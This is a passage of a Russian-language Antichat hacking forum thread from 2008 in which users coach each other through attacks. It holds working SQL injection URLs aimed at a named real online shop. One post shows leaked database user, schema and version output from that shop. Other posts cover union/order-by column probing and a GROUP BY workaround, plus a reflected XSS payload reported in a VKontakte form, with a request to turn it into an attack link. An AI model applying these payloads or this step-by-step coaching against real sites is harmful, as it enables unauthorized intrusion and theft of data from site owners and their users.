ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3891  
Старый 28.11.2008, 01:09
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*

почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*
 
Ответить с цитированием

  #3892  
Старый 28.11.2008, 01:20
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

проблемы с кодировкой используй конструкцию aes_decrypt(aes_encrypt())

/add jokester опередил с примером '(

Последний раз редактировалось l1ght; 28.11.2008 в 01:31..
 
Ответить с цитированием

  #3893  
Старый 28.11.2008, 01:24
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Неа. Это не помогает. почему-то.
 
Ответить с цитированием

  #3894  
Старый 28.11.2008, 01:27
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Ershik  
Неа. Это не помогает. почему-то.
отлично помогает
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,UNHEX(HEX(concat_ws(0x3a,User() ,Database(),Version()))),4,5,6,7,8.9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36/*

administrator@localhost:gestione:4.1.11-Debian_4sarge7-log

И это тоже разумеется :
http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,User(),Database(),Version()),1),1),4,5,6,7 ,8.9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36/*

Последний раз редактировалось jokester; 28.11.2008 в 01:30..
 
Ответить с цитированием

  #3895  
Старый 28.11.2008, 01:34
Аватар для Ershik
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

Я осознал.
Спасибо
 
Ответить с цитированием

  #3896  
Старый 28.11.2008, 15:21
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?
 
Ответить с цитированием

  #3897  
Старый 28.11.2008, 15:28
Аватар для foopi
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

Цитата:
Сообщение от SHS  
При исполнении следующих запросов :

page.php?id=-1'+order+by+3/* :

Unknown column '3' in 'order clause' (Казалось бы все нормально, НО!)

page.php?id=-1'+order+by+2/*

Выдает :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause

Что это означает? И как это победить?
так мож тут 2 колонки.
попробуй терь page.php?id=-1'+union+select+1,2/*
 
Ответить с цитированием

  #3898  
Старый 28.11.2008, 15:58
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Там и есть 2 колноки, но при запросе page.php?id=-1'+union+select+1,2/* :

Mixing of GROUP columns (MIN(),MAX(),COUNT(),...) with no GROUP columns is illegal if there is no GROUP BY clause
 
Ответить с цитированием

  #3899  
Старый 28.11.2008, 16:26
Аватар для l1ght
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

нужно указать группировку по полю (у вас конец запроса обрывается комментариями), т.е.
ляляля + group by поле/*

Последний раз редактировалось l1ght; 28.11.2008 в 16:29..
 
Ответить с цитированием

  #3900  
Старый 28.11.2008, 17:31
Аватар для winter_silence
winter_silence
Новичок
Регистрация: 22.11.2008
Сообщений: 5
Провел на форуме:
88733

Репутация: 0
По умолчанию

Я не уверен в том что это серьезный баг, вконтакте если зайти в свой аккаунт, раздел "мои группы" - справа вверху форма "фильтр групп".
В этой форме выполняется
Цитата:
"><script>alert('test')</script>
Код формы

Цитата:
<div class="groupsLookupCont"><input placeholder="Фильтр групп" id="g_filter" class="inputText" onkeyup="if (window.rs) {rs.lookup(this, event);}" type="text"></div>
<script type="text/javascript">
placeholderSetup('g_filter');
</script>
Собственно вопрос такой: можно ли сформировать ссылку XSS?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ